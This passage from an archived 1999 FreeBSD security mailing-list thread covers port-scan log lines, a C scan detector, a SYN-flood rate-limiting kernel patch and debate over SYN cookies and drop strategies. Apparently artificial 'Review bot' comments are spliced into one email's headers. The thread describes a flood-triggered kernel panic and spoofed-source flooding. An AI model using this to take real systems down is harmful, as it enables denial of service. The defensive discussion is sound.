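            printf("%s -> port %d/%s on %d hosts: %s\n", ents[i].src_host,
                   ents[i].dst_port, ents[i].proto, hosts, classify(&ents[i]));
        }
    }
    return found;
}

/* Constructed sample: danny's six Deny lines plus three Unreach UDP lines in
 * the same format quoted elsewhere in this thread (timestamps made up). */
const char *const sample_log[] = {
    "May 12 18:42:24 server /kernel: ipfw: 26000 Deny TCP 202.38.248.205:4359 a.b.c.1:1080 in via ed0",
    "May 12 18:42:27 server /kernel: ipfw: 26000 Deny TCP 202.38.248.205:4359 a.b.c.1:1080 in via ed0",
    "May 12 18:42:27 server /kernel: ipfw: 26000 Deny TCP 202.38.248.205:4401 a.b.c.15:1080 in via ed0",
    "May 12 18:42:30 server /kernel: ipfw: 26000 Deny TCP 202.38.248.205:4401 a.b.c.15:1080 in via ed0",
    "May 12 23:49:19 server /kernel: ipfw: 26000 Deny TCP 202.103.173.116:4196 a.b.c.1:1080 in via ed0",
    "May 12 23:49:20 server /kernel: ipfw: 26000 Deny TCP 202.103.173.116:4210 a.b.c.15:1080 in via ed0",
    "May 12 23:50:01 server /kernel: ipfw: 2010 Unreach UDP 209.156.6.31:1142 209.157.86.2:161 in via de0",
    "May 12 23:50:01 server /kernel: ipfw: 2010 Unreach UDP 209.156.6.31:1142 209.157.86.63:161 in via de0",
    "May 12 23:50:02 server /kernel: ipfw: 2010 Unreach UDP 209.156.6.31:137 209.157.86.63:137 in via de0",
};
const int sample_log_len = (int)(sizeof sample_log / sizeof sample_log[0]);
```

On the sample, `count_scanners(sample_log, sample_log_len, 2)` reports three sweeps: both TCP sources against port 1080 on a.b.c.1 and a.b.c.15, and the UDP source against port 161 on two hosts, while the single 137-to-137 datagram is left alone. The grouping is by source host and destination port rather than by source port, because, as the sample shows, the scanner's source port changes between targets.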
From: Matthew Dillon
Message-Id: <199905130222.TAA90284@apollo.backplane.com>
To: "danny"
Subject: Re: network scan?
References: <000201be9cdd$46a868a0$6f00000a@domain.pentalpha.com.hk>

:I found the following from the log file. What those people doing?
:
:
:May 12 18:42:24 server /kernel: ipfw: 26000 Deny TCP 202.38.248.205:4359
:a.b.c.1:1080 in via ed0
:...

    I get this all the time from people scanning for netbios. I usually
    just ignore them. If I'm in a bad mood I send a nasty gram to the
    originating network.

					-Matt
					Matthew Dillon

    ipfw: 2010 Unreach UDP 209.156.6.31:1142 209.157.86.2:161 in via de0
    :...
    ipfw: 2010 Unreach UDP 209.156.6.31:1142 209.157.86.63:161 in via de0
    :...
    ipfw: 2010 Unreach UDP 209.156.6.31:137 209.157.86.63:137 in via de0
    :...

From owner-freebsd-security Wed May 12 19:47:37 1999
Date: Thu, 13 May 1999 12:18:16 +0930 (CST)
From: Kris Kennaway
To: Matthew Dillon
Cc: danny, freebsd-security@freebsd.org
Subject: Re: network scan?
In-Reply-To: <199905130222.TAA90284@apollo.backplane.com>

On Wed, 12 May 1999, Matthew Dillon wrote:

> :May 12 18:42:24 server /kernel: ipfw: 26000 Deny TCP 202.38.248.205:4359
> :a.b.c.1:1080 in via ed0
> :...
>
> I get this all the time from people scanning for netbios. I
> usually just ignore them. If I'm in a bad mood I send a nasty gram
> to the originating network.

In this case they're looking for an open SOCKS proxy (so they can use it to
bounce attacks against other machines, most likely). I usually do what Matt
does as well - if they're scanning really heavily then I might slap a
blanket ban on their IP address(es). Don't forget though that TCP connection
initiations (i.e. the initial step of the 3-way handshake) can be forged if
they're designed to just bounce off your firewall (i.e. not actually connect
to anything which may be listening) - so watch out for cutting off
connectivity to a legitimate client.

> :...
> ipfw: 2010 Unreach UDP 209.156.6.31:1142 209.157.86.63:161 in via de0
> :...
> ipfw: 2010 Unreach UDP 209.156.6.31:137 209.157.86.63:137 in via de0
> :...
>

Windows machines like to attempt NetBIOS connections to machines on the
internet when you do things like connect to a website - a lot of the UDP
137-139 traffic is harmless noise (AFAIK it always connects from port 13x to
port 13x as in the above example). There's no excuse for probing SNMP ports
though.

Kris

----
"That suit's sharper than a page of Oscar Wilde witticisms that's been
rolled up into a point, sprinkled with lemon juice and jabbed into someone's
eye"
"Wow, that's sharp!"
- Ace Rimmer and the Cat, _Red Dwarf_

From owner-freebsd-security Thu May 13 0: 5:32 1999
Date: Thu, 13 May 1999 14:04:47 +0700 (OSS)
From: Eugeny Kuzakov
Message-Id: <199905130704.OAA09964@lab321.ru>
To: security@freebsd.org
Subject: KKIS.05051999.003b

hi, all.

What about patches for 2.2-stable?

Thanks.
Eugeny.

From owner-freebsd-security Thu May 13 15:18:10 1999
Message-Id: <4.2.0.37.19990513161529.00c1e3f0@localhost>
Date: Thu, 13 May 1999 16:17:57 -0600
To: security@FreeBSD.ORG
From: Brett Glass
Subject: Forwarded from BUGTRAQ: SYN floods against FreeBSD

Approved-By: aleph1@UNDERGROUND.ORG
Date: Thu, 13 May 1999 11:35:43 -0700
Reply-To: Richard Steenbergen
Sender: Bugtraq List
From: Richard Steenbergen
Subject: SYN floods against FreeBSD
To: BUGTRAQ@netspace.org

Here's a quickie for the people who have been plagued with high bandwidth
syn flood attacks, a kernel patch for FreeBSD 3.1-STABLE which rate limits
SYN processing. It's messy but functional and I don't have time to make it
better (that's the fbsd developers' job, not mine :P). cd /usr/src/sys,
patch < synlim, add "options SYN_RATELIM" (I highly recommend ICMP_BANDLIM
as well) to your kernel, recompile, and sysctl net.inet.tcp.synlim will be
available (default to 100). This is the maximum number of SYNs per second
that will be processed, the rest will be silently discarded. On my test
system (P2 450 running 3.1-stable being hit w/15,000 packets per sec), this
has successfully brought CPU usage from 100% to ~20% (against an open port
which is replying with unacknowledged ACKs).

Which brings us to the more sticky topic of kernel panics when under SYN
flood (which I believe to be the cause of some earlier posts from certain
people at Exodus Communications *cough*).
Lord knows I found enough of them when doing this testing, but the one that
seems to be the biggie for crashing when under syn flood is as follows (heh
just turned off the synlim and panic'd within 8 seconds while writing this):

panic: free: multiple frees

(kgdb) bt
#0  boot (howto=256) at ../../kern/kern_shutdown.c:285
#1  0xc0138c09 in panic (fmt=0xc02192b7 "free: multiple frees")
    at ../../kern/kern_shutdown.c:446
#2  0xc0135aaf in free (addr=0xc0cdd600, type=0xc0239330)
    at ../../kern/kern_malloc.c:333
#3  0xc01768f4 in ifafree (ifa=0xc0cdd600) at ../../net/route.c:262
#4  0xc0176876 in rtfree (rt=0xc34ce700) at ../../net/route.c:236
#5  0xc0176c84 in rtrequest (req=2, dst=0xc34cbac0, gateway=0xc34cbad0,
    netmask=0x0, flags=393223, ret_nrt=0x0) at ../../net/route.c:536
#6  0xc017b34d in in_rtqkill (rn=0xc34ce700, rock=0xc0231610)
    at ../../netinet/in_rmx.c:242
#7  0xc0176064 in rn_walktree (h=0xc0cd9e00, f=0xc017b2fc , w=0xc0231610)
    at ../../net/radix.c:956
#8  0xc017b3ec in in_rtqtimo (rock=0xc0cd9e00) at ../../netinet/in_rmx.c:283
#9  0xc013d19b in softclock () at ../../kern/kern_timeout.c:124

Which after a quick examination seems to be a periodic routing table
cleanup. It seems that in_rtqtimo is scheduled to run every
net.inet.ip.rtexpire seconds (which is dynamically adjusted and can never go
lower than net.inet.ip.rtminexpire). When the system is under heavy load
from processing lots of small packets (they don't even have to be SYNs,
anything which can get routed will do the trick, though the packet kiddies
would get very little gain from just sending an ip header since it's going
to be padded to 64 bytes for the eth frame anyhow), this route cleanup code
will go wacking at routes it shouldn't and free some memory twice. In the
course of testing I've gotten my rtq_reallyold to -3 and seen lots of
"tvotohz: negative time difference -2 sec 0 usec". Perhaps someone with free
time or more specific knowledge of this area would like to FIX IT?
=)

Perhaps when I get more free time I'll test some other *nix's. I would
really recommend putting all this rate limiting code at an ipfw level. If
you would like to contact me regarding this please use
humble@quadrunner.com (at least if you want a quick reply), thanks.

--
Richard Steenbergen       humble@EFNet       PGP ID: 0x741D0374
PGP Key Fingerprint: C6EF EFA0 83B2 071F 1AB6 B879 1F70 4303 741D 0374
http://users.quadrunner.com/humble

--=====================_194487001==_
Content-Type: text/plain; charset="us-ascii"

*** conf/options.old Sat May 15 23:08:03 1999 --- conf/options Sat May 15 23:40:21 1999 *************** *** 68,73 **** --- 68,74 ---- SYSVSHM opt_sysvipc.h UCONSOLE ICMP_BANDLIM + SYN_RATELIM # POSIX kernel options P1003_1B opt_posix.h *** netinet/tcp_var.h.old Sat May 15 23:25:39 1999 --- netinet/tcp_var.h Sat May 15 23:45:05 1999 *************** *** 40,45 **** --- 40,49 ---- * Kernel variables for tcp. */ + #ifdef KERNEL + #include "opt_syn_ratelim.h" + #endif + /* * Tcp control block, one per tcp; fields: * Organized for 16 byte cacheline efficiency. *************** *** 305,311 **** #define TCPCTL_RECVSPACE 9 /* receive buffer space */ #define TCPCTL_KEEPINIT 10 /* receive buffer space */ #define TCPCTL_PCBLIST 11 /* list of all outstanding PCBs */ ! #define TCPCTL_MAXID 12 #define TCPCTL_NAMES { \ { 0, 0 }, \ --- 309,316 ---- #define TCPCTL_RECVSPACE 9 /* receive buffer space */ #define TCPCTL_KEEPINIT 10 /* receive buffer space */ #define TCPCTL_PCBLIST 11 /* list of all outstanding PCBs */ ! #define TCPCTL_SYNLIM 12 /* Rate limiting of SYNs */ !
#define TCPCTL_MAXID 13 #define TCPCTL_NAMES { \ { 0, 0 }, \ *************** *** 320,325 **** --- 325,331 ---- { "recvspace", CTLTYPE_INT }, \ { "keepinit", CTLTYPE_INT }, \ { "pcblist", CTLTYPE_STRUCT }, \ + { "synlim", CTLTYPE_INT }, \ } #ifdef KERNEL *** netinet/tcp_input.c.old Sat May 15 23:08:10 1999 --- netinet/tcp_input.c Sun May 16 01:33:51 1999 *************** *** 72,77 **** --- 72,85 ---- static struct tcpiphdr tcp_saveti; #endif + #ifdef SYN_RATELIM + static int synlim = 100; + SYSCTL_INT(_net_inet_tcp, TCPCTL_SYNLIM, synlim, CTLFLAG_RW, &synlim, 0, ""); + #else + static int synlim = -1; + SYSCTL_INT(_net_inet_tcp, TCPCTL_SYNLIM, synlim, CTLFLAG_RD, &synlim, 0, ""); + #endif + static int tcprexmtthresh = 3; tcp_seq tcp_iss; tcp_cc tcp_ccgen; *************** *** 98,104 **** struct tcpiphdr *, struct mbuf *)); static int tcp_reass __P((struct tcpcb *, struct tcpiphdr *, struct mbuf *)); static void tcp_xmit_timer __P((struct tcpcb *, int)); ! /* * Insert segment ti into reassembly queue of tcp with --- 106,112 ---- struct tcpiphdr *, struct mbuf *)); static int tcp_reass __P((struct tcpcb *, struct tcpiphdr *, struct mbuf *)); static void tcp_xmit_timer __P((struct tcpcb *, int)); ! static int syn_ratelim(void); /* * Insert segment ti into reassembly queue of tcp with *************** *** 130,135 **** --- 138,183 ---- } \ } + #ifdef SYN_RATELIM + int syn_ratelim(void) + { + static int lticks; + static int lpackets; + int dticks; + + /* + * Return ok status if feature disabled or argument out of + * ranage. + */ + + if (synlim <= 0) + return(0); + + dticks = ticks - lticks; + + /* + * reset stats when cumulative dt exceeds one second. 
+ */ + + if ((unsigned int)dticks > hz) { + if (lpackets > synlim) + printf("syn rate limit reached %d/%d pps\n", lpackets, synlim); + lticks = ticks; + lpackets = 0; + } + + /* + * bump packet count + */ + + if (++lpackets > synlim) { + return(-1); + } + + return(0); + } + #endif + static int tcp_reass(tp, ti, m) register struct tcpcb *tp; *************** *** 379,384 **** --- 427,438 ---- ip_fw_fwd_addr = NULL; } else #endif /* IPFIREWALL_FORWARD */ + + #ifdef SYN_RATELIM + if ((tiflags & TH_SYN) && !(tiflags & TH_ACK)) + if (syn_ratelim() < 0) + goto drop; + #endif inp = in_pcblookup_hash(&tcbinfo, ti->ti_src, ti->ti_sport, ti->ti_dst, ti->ti_dport, 1); --=====================_194487001==_-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 13 18:28:15 1999 Delivered-To: freebsd-security@freebsd.org Received: from gw.whitefang.com (calnet11-70.gtecablemodem.com [207.175.234.70]) by hub.freebsd.org (Postfix) with SMTP id AE91D1522E for ; Thu, 13 May 1999 18:28:06 -0700 (PDT) (envelope-from shadows@whitefang.com) Received: (qmail 4467 invoked from network); 14 May 1999 01:28:05 -0000 Received: from rage.whitefang.com (shadows@192.168.1.3) by gw.whitefang.com with SMTP; 14 May 1999 01:28:05 -0000 Date: Thu, 13 May 1999 18:27:13 -0700 (PDT) 
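Review bot: the `+ SYN_RATELIM` line in the conf/options hunk names no header file, while the tcp_var.h hunk does `#include "opt_syn_ratelim.h"`; config(8) only emits a per-option header when the options entry maps the option to it, so change the entry to `SYN_RATELIM opt_syn_ratelim.h` (or include whatever header the option actually lands in) before anyone builds a kernel with the option on, otherwise the include fails.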
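Review bot: in the TCPCTL hunk, inserting TCPCTL_SYNLIM at 12 and moving TCPCTL_MAXID to 13 changes numbering that is exported to userland through tcp_var.h, so anything built against the old header that relies on TCPCTL_MAXID needs a rebuild; a sentence saying so belongs with the patch. The comment "Rate limiting of SYNs" should also state the unit (SYNs per second), since that is what the knob means.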
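Review bot: both SYSCTL_INT declarations in the tcp_input.c hunk pass "" as the description; put something like "SYNs processed per second, <= 0 disables" there. The CTLFLAG_RW knob has no range checking of its own, and the only handling of odd values is syn_ratelim() treating non-positive ones as off, so the description is the one place an administrator tuning net.inet.tcp.synlim can learn that.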
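Review bot: `static int syn_ratelim(void);` is declared unconditionally, but the definition is inside `#ifdef SYN_RATELIM`, so a kernel built without the option carries a static function that is declared and never defined, which gcc warns about; wrap the prototype in the same `#ifdef`. The definition also drops the `static`, and the prototype ignores the `__P((...))` convention the neighbouring declarations use; make the two agree.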
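Review bot: in the syn_ratelim() hunk, the comment "argument out of ranage" is misspelled and refers to an argument the function does not take; what is checked is the `synlim` sysctl, so say that. Two things deserve a comment in the code rather than the reader's guesswork: `lticks` and `lpackets` are file-static and updated with no locking, which is only safe while tcp_input() is entered serialized at splnet as it is in this kernel; and the limiter is a fixed one-second bucket that is reset only when a SYN arrives more than hz ticks after the last reset, so the printf reports the previous window's count at most once per window, which is a cheap and usable log signal that the limit is being hit.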
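Review bot: logic problem in the tcp_input() hook hunk when both IPFIREWALL_FORWARD and SYN_RATELIM are defined: the new block is inserted between the `} else` that closes the forwarded-address case and `inp = in_pcblookup_hash(...)`, so the dangling `else` now binds to the rate-limit `if`, and the lookup that used to be the else branch runs unconditionally and overwrites the `inp` found for the forwarded port. Move the check above the `#ifdef IPFIREWALL_FORWARD` block, or brace the else body. Secondary: the check runs before the PCB lookup, so SYNs aimed at ports with no listener also consume the per-second budget; if that is intended, say so in a comment.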
From: Thamer Al-Herbish
To: security@FreeBSD.ORG
Subject: Re: Forwarded from BUGTRAQ: SYN floods against FreeBSD
In-Reply-To: <4.2.0.37.19990513161529.00c1e3f0@localhost>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 13 May 1999, Brett Glass wrote:

> available (default to 100). This is the maximum number of SYNs per second
> that will be processed, the rest will be silently discarded. On my test

If I'm reading this correctly, it would not be very effective. I believe the OpenBSD fix was to randomly drop ports per a syn flooded port. So it would be "fair." Dropping all SYNs after a number of SYNs come in seems to be counterproductive.

Or does this actually work?

--
Thamer Al-Herbish PGP public key:
shadows@whitefang.com http://www.whitefang.com/pgpkey.txt
[ The Secure UNIX Programming FAQ http://www.whitefang.com/sup/ ]

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu May 13 19:21:13 1999
Delivered-To: freebsd-security@freebsd.org
Received: from puck.nether.net (puck.nether.net [204.42.254.5]) by hub.freebsd.org (Postfix) with ESMTP id D6C8614BE7 for ; Thu, 13 May 1999 19:21:09 -0700 (PDT) (envelope-from jared@puck.nether.net)
Received: (from jared@localhost) by puck.nether.net (8.9.3/8.7.3) id WAA25273; Thu, 13 May 1999 22:21:33 -0400 (envelope-from jared)
Date: Thu, 13 May 1999 22:21:33 -0400
From: Jared Mauch
To: Thamer Al-Herbish
Cc: security@FreeBSD.ORG
Subject: Re: Forwarded from BUGTRAQ: SYN floods against FreeBSD
Message-ID: <19990513222133.A23982@puck.nether.net>
Mail-Followup-To: Thamer Al-Herbish , security@FreeBSD.ORG
References: <4.2.0.37.19990513161529.00c1e3f0@localhost>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.95.1i
In-Reply-To: ; from Thamer Al-Herbish on Thu, May 13, 1999 at 06:27:13PM -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

What would be ideal is to have a fair-queue such as this:

	real-queue = 16
	extended-queue = 32

once the real-queue fills with syns, fill the extended queue, (these are folks that need syn-ack, btw), once the extended queue fills, begin sequentially dropping elements from the real-queue

	index++;
	index = index%16;
	drop(real_q[index]);
	move(real_q[index], extend_q[index]);
	(making extend_q[index] avail for the current syn to be put in)

and sequentially add elements from index on

if there is nothing in extend_q[index], you should not need to drop real_q[index]

(I picked 16 & 32 as arbitrary numbers, those can obviously be any size, preferably equal);

Obviously, doing preferred drops (based on dst port on our side), ie: we have 200 syns for port 80, but only 3 for port 22, deal with the 3 that are not causing a problem first, so we can get ssh in, but let the web folks go a bit slower.

Doing truly random drops is always better, but on the average server will induce more load than you'll save (IMHO).

	- jared

On Thu, May 13, 1999 at 06:27:13PM -0700, Thamer Al-Herbish wrote:
> On Thu, 13 May 1999, Brett Glass wrote:
>
> > available (default to 100). This is the maximum number of SYNs per second
> > that will be processed, the rest will be silently discarded. On my test
>
> If I'm reading this correctly, it would not be very effective. I
> believe the OpenBSD fix was to randomly drop ports per a syn flooded
> port. So it would be "fair." Dropping all SYNs after a number of SYNs
> come in seems to be counterproductive.
>
> Or does this actually work?
>
> --
> Thamer Al-Herbish PGP public key:
> shadows@whitefang.com http://www.whitefang.com/pgpkey.txt
> [ The Secure UNIX Programming FAQ http://www.whitefang.com/sup/ ]
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message

--
Jared Mauch | pgp key available via finger from jared@puck.nether.net
clue++; | http://puck.nether.net/~jared/ My statements are only mine.

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu May 13 19:29:55 1999
Delivered-To: freebsd-security@freebsd.org
Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 492BA14BE7 for ; Thu, 13 May 1999 19:29:51 -0700 (PDT) (envelope-from brett@lariat.org)
Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id UAA20729; Thu, 13 May 1999 20:29:40 -0600 (MDT)
Message-Id: <4.2.0.37.19990513202450.0444fca0@localhost>
X-Sender: brett@localhost
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.37 (Beta)
Date: Thu, 13 May 1999 20:29:38 -0600
To: Jared Mauch , Thamer Al-Herbish
From: Brett Glass Subject: Re: Forwarded from BUGTRAQ: SYN floods against FreeBSD Cc: security@FreeBSD.ORG In-Reply-To: <19990513222133.A23982@puck.nether.net> References: <4.2.0.37.19990513161529.00c1e3f0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org How often are the IP addresses spoofed during SYN floods? (I know it's perfectly practical to do so, since the flooder doesn't care about responses, but routers may preclude it.) It could be that discarding SYNS from addresses that send excessive numbers of them would let the legitimate folk keep working. As a backup, there could also be a random discard mechanism. --Brett At 10:21 PM 5/13/99 -0400, Jared Mauch wrote: > What would be ideal is to have a fair-queue such as this: > > real-queue = 16 > extended-queue = 32 > > once the real-queue fills with syns, fill the extended >queue, (these are folks that need syn-ack, btw), once the >extended queue fills, begin sequentially dropping elements from the >real-queue > > index++; > index = index%16; > drop(real_q[index]); > move(real_q[index], extend_q[index]); > (making extend_q[index] avail for the current syn to be put in) > > and sequentially add elements from index on > > if there is nothing in extend_q[index], you should not need >to drop real_q[index] > > (I picked 16 & 32 as arbitary numbers, those can obviously >be any size, preferably equal); > > Obviously, doing prefered drops (based on dst port on our side), >ie: we have 200 syns for port 80, but only 3 for port 22, deal with the >3 that are not causing a problem first, so we can get ssh in, but let the >web folks go a bit slower. > > Doing truly random drops are always better, but on the average server >will induce more load than you'll save (IMHO). 
> > - jared > >On Thu, May 13, 1999 at 06:27:13PM -0700, Thamer Al-Herbish wrote: > > On Thu, 13 May 1999, Brett Glass wrote: > > > > > available (default to 100). This is the maximium number of SYNs per second > > > that will be processed, the rest will be silently discarded. On my test > > > > If I'm reading this correctly, it would not be very effective. I > > believe the OpenBSD fix was to randomly drop ports per a syn flooded > > port. So it would be "fair." Dropping all SYNs after a number of SYNs > > come in seems to be counter productive. > > > > Or does this actually work? > > > > -- > > Thamer Al-Herbish PGP public key: > > shadows@whitefang.com http://www.whitefang.com/pgpkey.txt > > [ The Secure UNIX Programming FAQ http://www.whitefang.com/sup/ ] > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > >-- >Jared Mauch | pgp key available via finger from jared@puck.nether.net >clue++; | http://puck.nether.net/~jared/ My statements are only mine. > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 13 19:38:49 1999 Delivered-To: freebsd-security@freebsd.org Received: from gw.whitefang.com (calnet11-70.gtecablemodem.com [207.175.234.70]) by hub.freebsd.org (Postfix) with SMTP id 7A7C214BE7 for ; Thu, 13 May 1999 19:38:39 -0700 (PDT) (envelope-from shadows@whitefang.com) Received: (qmail 4588 invoked from network); 14 May 1999 02:38:37 -0000 Received: from rage.whitefang.com (shadows@192.168.1.3) by gw.whitefang.com with SMTP; 14 May 1999 02:38:37 -0000 Date: Thu, 13 May 1999 19:37:44 -0700 (PDT) 
From: Thamer Al-Herbish
To: security@FreeBSD.ORG
Subject: Re: Forwarded from BUGTRAQ: SYN floods against FreeBSD
In-Reply-To: <19990513222133.A23982@puck.nether.net>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 13 May 1999, Jared Mauch wrote:

> What would be ideal is to have a fair-queue such as this:
>
> real-queue = 16
> extended-queue = 32
>
> once the real-queue fills with syns, fill the extended
> queue, (these are folks that need syn-ack, btw), once the
> extended queue fills, begin sequentially dropping elements from the
> real-queue

I don't see you mentioning why it's more fair? Are you assuming that the real queue will most likely have bogus packets? If the bogus syn packets are coming in faster than the real ones you'll wind up kicking off all the real ones.

I'm assuming the random dropping will be more fair because in time you'll eventually respond to real SYNs in the face of a storm of bogus SYNs.

Btw, if it matters any I liked Bernstein's syn cookies. The only conceivable problem there was storing initial TCP option information which could not be done because of the cookie-response design.

Quick summary of syn cookies:

You would send back a cookie as the sequence number based on a secret that changes every so often hashed with the client's initial sequence number. If you get back a SYN-ACK, you check it against the same hash, and a match means you can respond and finish the handshake. You effectively _never_ store information about the first SYNs and thus _never_ have to worry about resources. TCBs are created after the handshake is completed.

> Obviously, doing preferred drops (based on dst port on our side),
> ie: we have 200 syns for port 80, but only 3 for port 22, deal with the
> 3 that are not causing a problem first, so we can get ssh in, but let the
> web folks go a bit slower.

Why not deal with them both?
In both instances you either accept or drop incoming SYNs. It doesn't cost you more to handle both unless you're talking about CPU cycles with which the added overhead of not handling would be insignificant. Or are you assuming otherwise? -- Thamer Al-Herbish PGP public key: shadows@whitefang.com http://www.whitefang.com/pgpkey.txt [ The Secure UNIX Programming FAQ http://www.whitefang.com/sup/ ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 13 19:40:13 1999 Delivered-To: freebsd-security@freebsd.org Received: from puck.nether.net (puck.nether.net [204.42.254.5]) by hub.freebsd.org (Postfix) with ESMTP id 2932A1541B for ; Thu, 13 May 1999 19:40:10 -0700 (PDT) (envelope-from jared@puck.nether.net) Received: (from jared@localhost) by puck.nether.net (8.9.3/8.7.3) id WAA25919; Thu, 13 May 1999 22:40:39 -0400 (envelope-from jared) Date: Thu, 13 May 1999 22:40:39 -0400 
From: Jared Mauch To: Brett Glass Cc: Jared Mauch , Thamer Al-Herbish , security@FreeBSD.ORG Subject: Re: Forwarded from BUGTRAQ: SYN floods against FreeBSD Message-ID: <19990513224039.A25812@puck.nether.net> Mail-Followup-To: Brett Glass , Thamer Al-Herbish , security@FreeBSD.ORG References: <4.2.0.37.19990513161529.00c1e3f0@localhost> <19990513222133.A23982@puck.nether.net> <4.2.0.37.19990513202450.0444fca0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.1i In-Reply-To: <4.2.0.37.19990513202450.0444fca0@localhost>; from Brett Glass on Thu, May 13, 1999 at 08:29:38PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, May 13, 1999 at 08:29:38PM -0600, Brett Glass wrote: > How often are the IP addresses spoofed during SYN floods? (I know Most often, that's why you get your syn-ack holding queue so large, you ack the forged syn, making it impossible to get the rest of the tcp handshake going, as there is no machine, therefore hogging your system resources. > it's perfectly practical to do so, since the flooder doesn't > care about responses, but routers may preclude it.) > > It could be that discarding SYNS from addresses that send excessive > numbers of them would let the legitimate folk keep working. Yes, this would be good. > As a backup, there could also be a random discard mechanism. 
This is necessary for the syn-attack issue, or at least something pseudo-random, for both the syn-q and the syn-ack-q - jared > At 10:21 PM 5/13/99 -0400, Jared Mauch wrote: > > What would be ideal is to have a fair-queue such as this: > > > > real-queue = 16 > > extended-queue = 32 > > > > once the real-queue fills with syns, fill the extended > >queue, (these are folks that need syn-ack, btw), once the > >extended queue fills, begin sequentially dropping elements from the > >real-queue > > > > index++; > > index = index%16; > > drop(real_q[index]); > > move(real_q[index], extend_q[index]); > > (making extend_q[index] avail for the current syn to be put in) > > > > and sequentially add elements from index on > > > > if there is nothing in extend_q[index], you should not need > >to drop real_q[index] > > > > (I picked 16 & 32 as arbitary numbers, those can obviously > >be any size, preferably equal); > > > > Obviously, doing prefered drops (based on dst port on our side), > >ie: we have 200 syns for port 80, but only 3 for port 22, deal with the > >3 that are not causing a problem first, so we can get ssh in, but let the > >web folks go a bit slower. > > > > Doing truly random drops are always better, but on the average server > >will induce more load than you'll save (IMHO). > > > > - jared > > > >On Thu, May 13, 1999 at 06:27:13PM -0700, Thamer Al-Herbish wrote: > > > On Thu, 13 May 1999, Brett Glass wrote: > > > > > > > available (default to 100). This is the maximium number of SYNs per second > > > > that will be processed, the rest will be silently discarded. On my test > > > > > > If I'm reading this correctly, it would not be very effective. I > > > believe the OpenBSD fix was to randomly drop ports per a syn flooded > > > port. So it would be "fair." Dropping all SYNs after a number of SYNs > > > come in seems to be counter productive. > > > > > > Or does this actually work? 
> > > > > > -- > > > Thamer Al-Herbish PGP public key: > > > shadows@whitefang.com http://www.whitefang.com/pgpkey.txt > > > [ The Secure UNIX Programming FAQ http://www.whitefang.com/sup/ ] > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-security" in the body of the message > > > >-- > >Jared Mauch | pgp key available via finger from jared@puck.nether.net > >clue++; | http://puck.nether.net/~jared/ My statements are only mine. > > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org > >with "unsubscribe freebsd-security" in the body of the message -- Jared Mauch | pgp key available via finger from jared@puck.nether.net clue++; | http://puck.nether.net/~jared/ My statements are only mine. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 13 19:42:12 1999 Delivered-To: freebsd-security@freebsd.org Received: from gw.whitefang.com (calnet11-70.gtecablemodem.com [207.175.234.70]) by hub.freebsd.org (Postfix) with SMTP id 4FC4E1536B for ; Thu, 13 May 1999 19:42:06 -0700 (PDT) (envelope-from shadows@whitefang.com) Received: (qmail 4608 invoked from network); 14 May 1999 02:42:05 -0000 Received: from rage.whitefang.com (shadows@192.168.1.3) by gw.whitefang.com with SMTP; 14 May 1999 02:42:05 -0000 Date: Thu, 13 May 1999 19:41:12 -0700 (PDT) 
From: Thamer Al-Herbish To: security@FreeBSD.ORG Subject: Re: Forwarded from BUGTRAQ: SYN floods against FreeBSD In-Reply-To: <4.2.0.37.19990513202450.0444fca0@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 13 May 1999, Brett Glass wrote: > How often are the IP addresses spoofed during SYN floods? (I know > it's perfectly practical to do so, since the flooder doesn't > care about responses, but routers may preclude it.) Completely arbitrary. I could literally send out thousands as long as I know they are unreachable. I could use, say 10 different addresses and make a zillion packets. Bandwidth and my imagination are the only barriers. > It could be that discarding SYNS from addresses that send excessive > numbers of them would let the legitimate folk keep working. Yes, but it will be worthless against syn flooders. Keep in mind that you want an unreachable address: the returned SYN-ACK is irrelevant. -- Thamer Al-Herbish PGP public key: shadows@whitefang.com http://www.whitefang.com/pgpkey.txt [ The Secure UNIX Programming FAQ http://www.whitefang.com/sup/ ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 13 21:38:26 1999 Delivered-To: 